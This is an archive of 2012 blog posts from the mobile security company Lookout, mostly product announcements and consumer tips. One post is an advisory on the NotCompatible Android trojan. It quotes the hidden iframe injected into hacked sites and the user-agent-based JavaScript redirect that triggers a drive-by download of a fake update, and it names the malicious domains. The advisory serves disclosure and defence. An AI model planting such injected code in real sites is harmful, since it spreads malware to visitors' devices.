May 15, 2012
By lookout
Hello, ni hao, 안녕하세요, приве́т!;
The Lookout passport is getting pretty full. Our award-winning Android security app is now available on Google Play in Russian, Korean and Traditional Chinese. This is in addition to the previously localized versions of Lookout in German, French, Japanese, Spanish, Brazilian Portuguese, Polish and Simplified Chinese.
Users around the world can now keep their mobile device protected in their local language. With today’s additions, Lookout is now available in eleven different languages! Here are a few fun facts to celebrate today’s launch:
Read more
May 11, 2012
By Kia
Let’s face it, making phone calls is so ten years ago. Text messaging is the dominant form of mobile communication, and spammers are chomping at the bit to take advantage of that. And when you think about how little the cost of engaging in such malicious activity really is, it’s no wonder U.S. spam texts rose 45 percent last year to 4.5 billion total messages. A prospective spammer needs just a prepaid phone with an unlimited texting plan to wreak SMS havoc on millions of unsuspecting victims, all of which they can do for a minimal $50-$100 fee. With returns that see no bounds, the only way to stop these perpetrators without government intervention is knowing how to protect yourself. Fortunately, Lookout’s got your back for that! Here are some steps you can take to ward off those pesky spammers:
Report spam texts to your carrier.
- Supported by AT&T Inc., Verizon Wireless, Sprint Nextel Corp. or T-Mobile USA? Forward spam texts to ’7726′ to deter future wrongdoing. You can also access your carrier’s website or customer service line to block numbers from which you receive spam, too.
Register your mobile number with the FTC’s Do Not Call Registry.
- Go to www.donotcall.gov and enter your digits. Numbers on this list will be off limits to potential spammers within a month of getting on the list. If unwarranted calls keep coming your way, you can report abusers on the same site.
Reply to unsolicited messages with “STOP” to prevent future texts from that sender.
- Really, it’s that easy. When clicking on a spam link installs malware on your phone or authorizes premium charges on your phone bill, this is often times your best mode of defense.
Use apps to cope with spam.
- The Kedlin Company’s Call Control app for Android devices can block communication from unwanted numbers.
May 9, 2012
By lookout
Many of us have felt the pain of losing our most valuable accessory, have seen a friend panic because they misplaced their phone and it’s on silent, or have heard an announcement over a loud speaker asking if anyone has found a lost phone. If you find yourself in one of these desperate situations, you could be in luck. You can download Plan B, an innovative app that can help you find your phone after it goes missing!
While “Plan A” is not losing your phone, (or already having a find my phone app like Lookout), Plan B is your last resort to locating your Android device.
Here’s a quick step-by-step guide on how to use Plan B to find your Android device if it goes missing:
- Go to Google Play (formerly know as the Android Market). Make sure you visit the desktop web version, not the Google Play app on your phone, and search for Plan B, or go directly to the Plan B page.
- Click Install. Plan B will then begin to remotely download on your phone.
- As soon as it is finished installing (which does require a data connection), Plan B will send an email to your Gmail account telling you it is locating your phone.
- Once Plan B has located your phone, check your Gmail again to find a link to a Google Map of your phone’s location. For 10 minutes Plan B will send you a series of emails with refined location updates – so be patient!
- If your phone seems to be on the move, or you aren’t able to find your phone within 10 minutes of downloading Plan B, you can text yourself the word “locate” from a friend’s phone in order to start the locate process again.
While Plan B can locate your phone, it unfortunately can’t go and retrieve it for you. So if you find that your phone is in a location you are not familiar with, please contact the authorities who will be able to help you get it back.
If you want to be even more prepared, your “Plan A” should always be Lookout. That way, if your phone is ever lost or stolen, you can log into your Lookout account at mylookout.com and locate your phone on a map, then make it ‘scream’ once you get close!
Click to enlarge
May 9, 2012
By patty
No, this is not a headline from The Onion. It’s true! Our CFO, Adriel Lares, was on Family Guy this week. In the episode Lego My Mego, Adriel can be seen in a CFO-appropriate blue suit and red tie. Image included below.
And since we started the conversation, here’s more on Adriel.
- Relevant CFO-type facts: Before Lookout, Adriel was at Hewlett-Packards 3PAR Storage division. He led 3PAR’s IPO back in ’07 and grew its annual run rate to more than $200 million. He began his career as a treasury analyst for the Walt Disney Company. He likes cartoons!
- Not-as-relevant facts: Adriel digs The Family Guy. He is also vintner of the finest Napa Cabernet known to man (self-proclaimed).
May 8, 2012
By lookout
These days, it seems that kids of all ages are attached at the fingertip to the latest and coolest mobile devices. This isn’t your eyes playing tricks on you. This is Generation Mobile. A recent study[1] found that 38 percent of kids between the ages of 13 and 17 own a smartphone, and more than 75 percent of kids ages 2 to 13 have regular access to a smartphone!
Today, we’re excited to share that we’ve teamed up with Sprint on a new family product. Introducing Lookout Family, a new product that will enable Sprint customers to manage their phone security, find a family member’s missing device when it is lost or stolen, and backup precious data. Lookout Family is part of Sprint Guardian, a new product that provides a simple way for families to protect their children, and every mobile device in the household, with security and safety applications.
With the Lookout Family app, parents can safeguard their families against mobile threats including malware, spyware and phishing, in addition to tracking down lost phones and backing up precious data like family photos. Also, Lookout Family offers an easy way to set up and manage the security of multiple devices in the household. Lookout Family will be available as part of Sprint Guardian for Sprint family customers through the Sprint Zone.
At Lookout, we know that entire families—not just the adults—are using smartphones and that everyone needs to be kept safe and secure. Do your kids have smartphones? Tell us in the comments section!
May 7, 2012
By lookout
Lookout Super User: John Houchins
Occupation: Computer Network Technician
Location: Martinsburg, West Virginia
Device type: HTC EVO
John’s favorite Lookout feature: Backup
What does John use his phone for? “I use my phone for just about everything. I have all of my work contacts on it, IM capabilities enabled, I keep notes in regards to ‘things to do’ both for home and work, and I love taking pictures with the camera.”
How Lookout saved the day for John:
“One day, when an Android update was pushed to my smartphone, I noticed my phone began reloading often: sometimes three or four times a day. I noticed this usually happened after I had accessed an application. A colleague of mine mentioned to me that he had been having the same problem and said that when he restored his phone’s factory defaults the problem ‘went away.’ In my haste to stop my phone from continually reloading I immediately went through the process to restore the phone back to factory settings. As it was rebooting I realized that this was not a great idea – as I had forgotten to back up my phone before resetting my device! As a technician on a computer network I know to ALWAYS back up your data BEFORE you do anything like this, but in a frenzy of frustration I had not thought this through.
“In many ways, a lot of my life is on/in this phone. While I was kicking myself thinking of all of the information I had lost, I suddenly remembered Lookout and immediately logged into the website. I couldn’t believe it, my data was all there and within minutes Lookout had pushed my contacts back to the phone. That was a lifesaver! Call histories, contact lists…all restored. VERY impressive; love it! Thanks Lookout.”
May 4, 2012
By lookout
Updated with further clarifications.
In the 24 hours since we identified NotCompatible, we’ve seen detections on thousands of devices. If you’re just tuning in, NotCompatible is the first time that we’ve seen malware writers specifically targeting Android devices through compromised websites (see our original post for more). When visiting one of the infected sites from an Android device, the malware will automatically start downloading. Then, NotCompatible poses as a security update to trick users into installing the downloaded file. We’ve seen this trick before: GGTracker, discovered in 2011, was one of the first instances of Android-targeted drive-by downloads. Once installed, NotCompatible acts as a proxy, thereby allowing its owner to transmit and receive network data through the infected device.
Based on our observations since initial detection, it appears that NotCompatible’s authors are using infected Android devices for online fraud. Because legitimate sites often use the source of network data as a way to detect fraud, bad guys try to hide where they are coming from. NotCompatible allows them to engage in fraud, while making their network traffic look like it is coming from legitimate mobile devices all around the world. So far, we have observed attackers making various purchases—for example, tickets to a Red Hot Chili Peppers concert via TicketMaster and shopping on the Apple App Store. Such network proxies are also a concern for Enterprise and Government because they can allow attackers to gain access to sensitive internal networks. The good news is that there doesn’t appear to be any evidence that the people behind NotCompatible were targeting specific companies or governments. Also, there doesn’t seem to be a way for the malware to update itself or compromise any information on your device—it’s a fairly simple network data proxy. All Lookout users are protected from this threat.
May 4, 2012
By lookout
Smartphones are valuable tools that help us navigate through everyday life: they’re our camera, MP3 Player, Rolodex, and GPS. Unfortunately, thieves think they are valuable too! According to law enforcement officials, phone theft is actually one of the fastest growing crimes in the U.S. Check out the infographic below to learn more about “Grand Theft Mobile,” and see how you can keep your smartphone safe!
May 2, 2012
By lookout
Update Two: Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.
Distribution of NotCompatible depends on compromised websites that have a hidden iframe at the bottom of each page. If a user visits a compromised website from an Android device, their mobile web browser will automatically begin downloading the NotCompatible application, named ‘Update.apk’. Like any drive-by downloads, a user needs to install the downloaded application before a device will be infected. Based on our initial investigation, we’ve confirmed that a number of websites have been compromised. However, affected sites appear to show relatively low traffic and we expect total impact to Android users to be low.
This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.
Update: All Lookout users are currently protected against NotCompatible. Lookout protects users from drive-by downloads when the features File System Monitoring and Install Monitoring are active. These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD Card, and immediately before they are installed via sideloading.
Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NotCompatible.
How it Works
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, the installation will be blocked.
(Screenshots originally posted by redditor, Georgiabiker)
Technical details
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.
Suspicious applications are currently served from the following sites:
- gaoanalitics.info
- androidonlinefix.info
Command and Control (C&C) domains include:
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous. As Lookout identifies the extent of infected websites, we will update this blog post.
The Lookout security team is actively investigating the infected websites and suspicious application. Refer back to this blog post for regular updates on this security alert.
April 30, 2012
By lookout
Today we’re excited to tell you about two new features in Lookout for Android: File System Monitoring and Install Monitoring. These free features provide added protection from malware and spyware, especially for people who like to download apps from a variety of different sources. Like Lookout’s core security functionality, these new features are powered by Lookout’s Mobile Threat Network.
If you download apps from alternative markets or other sources such as discussion forums (commonly referred to as “side-loading” apps), File System Monitoring and Install Monitoring add an extra level of protection for you. While Lookout already protects users from these types of applications by scanning them immediately upon install, these two new features offer unique ways to detect threats before they are installed on a device.
The ability to download apps from a variety of sources is considered one of the unique strengths of the Android platform. However, we generally advise people to use caution when “side-loading,” or downloading an app outside of the official Android Market (aka Google Play) in order to minimize the chance of encountering malware. We know a lot of our users like to explore everything on Android, even if that means downloading apps from a source you’ve never even heard of before. For these cases, File System Monitoring and Install Monitoring are here to protect you.
File System Monitoring
File System Monitoring actively watches your SD card for file changes. When a new app is downloaded to your SD card, but not yet installed, File System Monitoring will alert you in real time if it’s malware. This active monitoring is a much better watchdog for your SD card than a scheduled file system scan, and we’ve designed it in a way that won’t impact your battery life. A file system scan scheduled for Tuesday won’t tell you about the malware you downloaded on Wednesday for six days!
Power users, take note! Because File System Monitoring relies on its ability to ‘watch’ the SD card for changes, it works great for most methods of side-loading, such as when you download an app from the web or from email directly on your mobile device. In cases where you un-mount your SD card to transfer apps manually, File System Monitoring won’t be able to scan any new apps you may transfer. This is where Install Monitoring comes in…
Install Monitoring
Lookout for Android is the first security app to feature Install Monitoring, giving you the option to scan apps at the beginning of a side-load app installation process. When you tap on an .apk package to install it, Install Monitoring will prompt you to optionally scan the app before installing. If an app checks out as clean, installation proceeds as normal without any inconvenience to you. You can even set this as a default behavior so that Lookout will automatically conduct scans on all future side-load installs!
Note that when you get apps from Google Play, they’re automatically downloaded and installed on your device, so Lookout’s existing security scanning is still an essential facet of mobile protection for users.
If you are an existing Lookout Free or Lookout Premium user, install the latest update of Lookout for Android to access these features. You can turn off automatic File System Monitoring in Settings>Security in the Lookout app. You’ll also be able to set preferences for Install Monitoring the first time you install a side-loaded app through Android’s standard intent selection dialog, and thereafter through the ‘Launch By Default’ section of Lookout’s App info page in system settings.
We think that these new features really add an important new level of security for power users – they’re like monster tires for off-roading on your Android! Let us know what you think!
Download Free
Learn More
© 2012 Lookout, Inc. All rights reserved. Patents pending.